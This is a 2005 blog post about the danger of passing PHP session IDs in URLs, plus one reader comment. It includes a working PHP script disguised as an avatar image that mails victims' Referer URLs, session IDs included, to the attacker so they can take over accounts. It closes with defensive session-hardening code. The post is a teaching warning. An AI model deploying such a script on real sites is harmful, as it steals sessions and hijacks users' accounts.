Why trusting in a site that passes your session ID around is bad
September 9, 2005
Just started reading Ilia Alshanetsky's new PHP Guide to Security book, found over at http://www.phparch.com, and I must say this is a must-have book for any serious PHP developer. The session security chapter alone is worth the price. Here is a little script I wrote which should point out why you should NEVER keep any personal information on a site that transmits its session IDs through the URL.
Let's say we're on a web forum together on www.xyz.com and I'm allowed to post the URL of an image to use as my avatar. Instead of www.jimsite.com/myimage.jpg I make it www.jimsite.com/fake_image.php,
so the HTML the forum outputs is:
<img src="http://www.jimsite.com/fake_image.php">
If the site passes your session ID in the URL, like www.xyz.com/?PHPSESSID=593584jgjdl59, then every time you view a page that shows my avatar your browser fetches my "image" from my server and sends the URL of the page you are on, query string included, in the Referer header. Guess what I can write in fake_image.php:
<?php
// lets check to see if we got something juicy
$referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (strpos($referrer, 'PHPSESSID=') !== false) {
    // mail the victim's full URL, session ID included, to myself (address is a placeholder)
    mail('me@jimsite.com', 'juicy', $referrer);
}
// then serve the real picture so nothing looks wrong in the forum
header('Content-Type: image/jpeg');
readfile('myimage.jpg');
?>
So it looks like it still outputs my image; however, I just emailed myself your URL string whenever it contains PHPSESSID, which is the default session ID name PHP uses. Once I get that email I can paste the URL into my browser and, guess what, I'm now you. I can get into your account and do whatever I want, and it was pretty darn easy.
be warned.. and get that book!
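For the site-side fix, here is an added example of mine (not code from the post or from Ilia's book): a PHP session bootstrap that keeps the ID out of the URL in the first place. The ID ends up in the URL because PHP's session.use_trans_sid rewrites links and forms to carry PHPSESSID when a visitor has no session cookie, and because session.use_only_cookies being off makes PHP accept an ID that arrives in the query string. Both settings are real ini directives and must be set before session_start(); the error_log() line and the login_user() function are my own additions to show where the checks go, and the delete-old-session argument to session_regenerate_id() needs PHP 5.1 or later.

```php
<?php
// Weak configuration the post warns about (shown as comments, not applied):
//   session.use_trans_sid   = 1   ; every link/form on the page gets ?PHPSESSID=... appended
//   session.use_only_cookies = 0  ; an ID in the query string is accepted as the session
//
// Hardened settings. These are PHP_INI_ALL, so they can be set here at runtime,
// but only before session_start() is called.
ini_set('session.use_only_cookies', '1'); // a PHPSESSID in the URL is ignored; cookie only
ini_set('session.use_trans_sid', '0');    // never rewrite URLs or forms to carry the ID
session_start();

// Belt and braces: with use_only_cookies on, an ID in the query string no longer
// selects a session, but its presence means some page is still leaking it, so record it.
// (Where this is logged is an assumption; error_log() goes to the SAPI/web server log by default.)
if (isset($_GET[session_name()])) {
    error_log('session ID seen in query string from ' . $_SERVER['REMOTE_ADDR']
        . ' referer=' . (isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-'));
}

// Call this once the user has authenticated. Swapping the ID means that anything
// that leaked (or was planted by an attacker) before login no longer maps to the
// logged-in session. This function is my own, not part of PHP.
function login_user($userId)
{
    session_regenerate_id(true); // true = discard the old session data under the old ID
    $_SESSION['user_id'] = $userId;
}
?>
```

The same two directives can be set in php.ini or an .htaccess `php_value` line for the whole site instead of per script; the important part is that they are in effect before the first session_start() of the request.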
Eddie Peloke says:
September 10, 2005 @ 17:58
Looks like I'll have to pick it up as soon as I finish the design patterns one.